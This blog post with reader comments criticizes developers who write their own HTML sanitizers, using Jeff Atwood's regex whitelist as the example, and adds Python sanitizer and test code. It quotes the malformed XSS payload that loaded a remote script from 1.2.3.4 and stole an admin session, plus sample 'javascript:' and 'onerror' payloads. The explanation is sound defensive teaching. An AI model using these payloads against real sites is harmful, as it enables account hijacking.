I'm often surprised by how often developers prefer reinventing the wheel to using off-the-shelf libraries when solving problems. This practice isn't limited to newbies who don't know any better; it extends to experienced developers who should. Experienced developers often justify reinventing the wheel by saying they don't want to take on unnecessary dependencies or don't trust other people's code. For example, take this conversation that flowed through my Twitter stream yesterday:

Jon Galloway
jongalloway: @codinghorror Oh, one last thing - I'd rather trust the tough code (memory management, SSL, parsing) to experts and common libraries. about 11 hours ago from Witty in reply to codinghorror

Jeff Atwood
codinghorror @jongalloway you're right, coding is hard. Let's go shopping! about 12 hours ago from web in reply to jongalloway

Jeff Atwood
codinghorror @jongalloway I'd rather make my own mistakes (for things I care about) than blindly inherit other people's mistakes. YMMV. about 12 hours ago from web in reply to jongalloway

The background on this conversation is that Jeff Atwood (aka codinghorror) recently decided to quit his job and create a new Website called stackoverflow.com. It is a question and answer site for asking programming questions where users can vote on the best answers to specific questions. You can think of it as Yahoo! Answers but dedicated to programming questions. You can read a review of the site by Michiel de Mare for more information.

Recently Jeff Atwood blogged about how he was planning to use regular expressions to sanitize HTML input on StackOverflow.com in his blog post entitled Regular Expressions: Now You Have Two Problems where he wrote

I'd like to illustrate with an actual example, a regular expression I recently wrote to strip out dangerous HTML from input. This is extracted from the SanitizeHtml routine I posted on RefactorMyCode.

var whitelist =
 @"</?p>|<br\s?/?>|</?b>|</?strong>|</?i>|</?em>|
  </?s>|</?strike>|</?blockquote>|</?sub>|</?super>|
  </?h(1|2|3)>|</?pre>|<hr\s?/?>|</?code>|</?ul>|
  </?ol>|</?li>|</a>|<a[^>]+>|<img[^>]+/?>";

What do you see here? The variable name whitelist is a strong hint. One thing I like about regular expressions is that they generally look like what they're matching. You see a list of HTML tags, right? Maybe with and without their closing tags?

The problem Jeff was trying to solve is how to allow a subset of HTML tags while stripping out all other HTML so as to prevent cross-site scripting (XSS) attacks. The flaw in Jeff's approach, which many commenters including Simon Willison pointed out, is that using regexes to filter HTML input in this way assumes the input will be fairly well-formed HTML. As many developers have found out the hard way, you also have to worry about malformed HTML, because many modern Web browsers parse HTML very liberally. To make the regex approach work, you pretty much have to reverse engineer every HTML parsing quirk of common browsers if you don't want to end up storing HTML which looks safe but actually contains an exploit. Jeff really should have been looking at a full-fledged HTML parser such as SgmlReader or Beautiful Soup instead of regular expressions.
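To make the parser-based alternative concrete, here is a minimal sketch in Python using only the standard library's html.parser module. It is not Jeff's code and not a vetted sanitizer. The names ALLOWED_TAGS, ALLOWED_ATTRS, SAFE_SCHEMES, WhitelistSanitizer and sanitize are all hypothetical, and the tag list only roughly mirrors the whitelist quoted above. The idea is that the output is rebuilt from parsed events, so nothing from the input is copied through verbatim.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hypothetical policy, loosely modelled on the whitelist quoted above.
ALLOWED_TAGS = {"p", "br", "b", "strong", "i", "em", "s", "strike",
                "blockquote", "sub", "sup", "h1", "h2", "h3", "pre",
                "hr", "code", "ul", "ol", "li", "a", "img"}
VOID_TAGS = {"br", "hr", "img"}               # never get a closing tag
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src"}}
SAFE_SCHEMES = {"http", "https"}              # deliberately strict: relative URLs are dropped too


class WhitelistSanitizer(HTMLParser):
    """Re-emits only whitelisted tags and attributes; escapes all text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # drop the tag itself; any text inside is still escaped
        kept = []
        for name, value in attrs:
            if (name in ALLOWED_ATTRS.get(tag, ())
                    and value
                    and urlsplit(value).scheme in SAFE_SCHEMES):
                kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data))


def sanitize(html_text: str) -> str:
    parser = WhitelistSanitizer()
    parser.feed(html_text)
    parser.close()
    return "".join(parser.out)


print(sanitize('<a href="javascript:alert(1)" onclick="x()">go</a>'))  # <a>go</a>
```

Because every piece of text and every attribute value goes through escape(), a literal `<script` can only reach the output if the policy allows it. This sketch does not balance unclosed tags, and a production site should still prefer a maintained sanitizing library over something this small.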

It didn't take long for the users of StackOverflow.com to show Jeff the error of his ways as evidenced by his post Protecting Your Cookies: HttpOnly where he acknowledges his mistake as follows

So I have this friend. I've told him time and time again how dangerous XSS vulnerabilities are, and how XSS is now the most common of all publicly reported security vulnerabilities -- dwarfing old standards like buffer overruns and SQL injection. But will he listen? No. He's hard headed. He had to go and write his own HTML sanitizer. Because, well, how difficult can it be? How dangerous could this silly little toy scripting language running inside a browser be?

As it turns out, far more dangerous than expected.

Imagine, then, the surprise of my friend when he noticed some enterprising users on his website were logged in as him and happily banging away on the system with full unfettered administrative privileges.

How did this happen? XSS, of course. It all started with this bit of script added to a user's profile page.

<img src=""http://www.a.com/a.jpg<script type=text/javascript 
src="http://1.2.3.4:81/xss.js">" /><<img 
src=""http://www.a.com/a.jpg</script>"

Through clever construction, the malformed URL just manages to squeak past the sanitizer. The final rendered code, when viewed in the browser, loads and executes a script from that remote server. 
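A quick way to see how a tag-level regex whitelist can wave through more than it appears to is to transcribe the pattern quoted earlier into Python and test a few individual tags against it. This is not a reconstruction of the exploit above. It assumes a sanitizer that keeps a tag only when the whole tag matches one of the alternatives, and the helper name is_whitelisted is hypothetical.

```python
import re

# Python transcription of the whitelist quoted earlier. re.VERBOSE makes the
# regex engine ignore the line breaks and indentation inside the pattern.
WHITELIST = re.compile(
    r"""</?p>|<br\s?/?>|</?b>|</?strong>|</?i>|</?em>|
        </?s>|</?strike>|</?blockquote>|</?sub>|</?super>|
        </?h(1|2|3)>|</?pre>|<hr\s?/?>|</?code>|</?ul>|
        </?ol>|</?li>|</a>|<a[^>]+>|<img[^>]+/?>""",
    re.VERBOSE,
)


def is_whitelisted(tag: str) -> bool:
    """Hypothetical helper: True if the whole tag matches one alternative."""
    return WHITELIST.fullmatch(tag) is not None


print(is_whitelisted("<script>"))                        # False
print(is_whitelisted('<a href="javascript:alert(1)">'))  # True
print(is_whitelisted("<img src=x onerror=alert(1)>"))    # True
```

The `<a[^>]+>` and `<img[^>]+/?>` alternatives accept anything up to the next `>`, so script-bearing attributes pass even though the tag names look harmless.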

The sad thing is that Jeff Atwood isn't the first programmer, nor will he be the last, to think to himself "It's just HTML sanitization, how hard can it be?". There are many lists of Top HTML Validation Bloopers that show how tricky it is to get the right solution to this seemingly trivial problem. It is also sad to note that, despite his recent experience, Jeff Atwood still argues that he'd rather make his own mistakes than blindly inherit the mistakes of others, as justification for continuing to reinvent the wheel in the future. That is unfortunate, because it is a bad attitude for a professional software developer to have.

Rolling your own solution to a common problem should be the last option on your list, not the first. Otherwise, you might just end up a candidate for The Daily WTF, and deservedly so.

Sunday, 31 August 2008 22:48:03 (GMT Daylight Time, UTC+01:00)
There is seldom a single correct answer, there are always trade-offs to be weighed. And there are bugs in all code.

Is it true what they say about enterprise developers, that they are afraid of code?
Monday, 01 September 2008 13:41:43 (GMT Daylight Time, UTC+01:00)
Developers, using libraries is not a sign of weakness ...
... because you must be a tough guy to not cringe in pain when plunging into the design nightmare that these other libraries are.

I'm not well-informed, but it seems to me that there is no ready-made HTML sanitizer (proper parser and output guaranteed to be a valid subset of HTML) around?
Tuesday, 02 September 2008 21:31:35 (GMT Daylight Time, UTC+01:00)
Jeff also just twittered the other night about how he's dumping log4net because they found it was causing the deadlocks they were seeing. I don't know if it was really a problem in the library but his attitude was that he doesn't like "dependencies" or third-party libraries in general. I asked if he was going to roll his own logging or not log and he said he's "not a fan of logging". That's his choice obviously but it seems like a severe case of Not Invented Here syndrome on both of these topics.
Wednesday, 03 September 2008 05:24:45 (GMT Daylight Time, UTC+01:00)
I listen to Jeff and Joel's podcast, and Jeff seems to have a less than professional attitude to software development; he reminds me of myself 15 years ago when I thought I knew everything. Joel does try hard to keep him on track though...
Tony B
Saturday, 06 September 2008 11:17:42 (GMT Daylight Time, UTC+01:00)
I wrote about this subject a few years ago, and my opinion still holds. Executive summary: reinventing wheels is fine, since it’s the only way to learn deeply. However, putting those wheels into production is not a proposition to take lightly; there, “pick your battles” applies.